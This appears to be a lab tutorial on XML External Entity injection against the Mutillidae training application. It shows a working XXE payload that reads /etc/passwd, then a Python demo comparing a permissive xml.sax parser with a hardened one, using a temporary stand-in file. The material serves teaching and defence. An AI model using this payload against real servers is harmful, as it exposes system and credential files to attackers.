XML External Entity (XXE) Injection - Mutillidae
Last updated
The following web page takes XML content submitted by the user and parses it with the server-side XML parser.
After clicking the Validate XML button, we get the parsed output shown below.
2. Let's try to abuse the parser to read the robots.txt file from the web server.
3. Let's modify the xml.txt file to contain the following code:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<creds>
  <user>&xxe;</user>
  <pass>mypass</pass>
</creds>

We can see that the parser has resolved the external entity, read the file from the server, and echoed its contents back in the response.
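To see exactly which parser setting makes the payload above work, here is an added example (not code from this page or from Mutillidae) that feeds the same payload shape to Python's xml.sax parser twice: once with external general entities enabled, as the vulnerable server behaves, and once with the hardened setting, which is the default in current Python. The target file is a constructed temporary file standing in for /etc/passwd, and the names SAMPLE_SECRET, TextCollector, parse_creds and demo are this example's own.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the file the page's payload targets; it is written
# to a temporary file so the demo never touches the real /etc/passwd.
SAMPLE_SECRET = "root:x:0:0:root:/root:/bin/bash\n"
# Same shape as the page's payload; the SYSTEM URI is filled in at run time.
PAYLOAD_TEMPLATE = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "{uri}" >]>
<creds><user>&xxe;</user><pass>mypass</pass></creds>"""

class TextCollector(ContentHandler):
    # Records each element's text, like the Mutillidae page echoing parsed values.
    def __init__(self):
        super().__init__()
        self.values, self._current = {}, None

    def startElement(self, name, attrs):
        self._current = name
        self.values.setdefault(name, "")

    def characters(self, content):
        if self._current is not None:
            self.values[self._current] += content

    def endElement(self, name):
        self._current = None

def parse_creds(xml_bytes, resolve_external):
    # feature_external_ges decides whether &xxe; is fetched; False is the hardened setting.
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.values["user"], handler.values["pass"]

def demo():
    # Returns the (user, pass) pair seen by the permissive parser and by the hardened one.
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp, "passwd")
        secret.write_text(SAMPLE_SECRET)
        xml_bytes = PAYLOAD_TEMPLATE.format(uri=secret.as_uri()).encode("latin-1")
        leaked = parse_creds(xml_bytes, True)
        hardened = parse_creds(xml_bytes, False)
    return leaked, hardened
```

With the feature enabled the <user> element comes back holding the file's contents; with it disabled the entity reference is simply dropped, which is the behaviour a server-side parser should have for untrusted input.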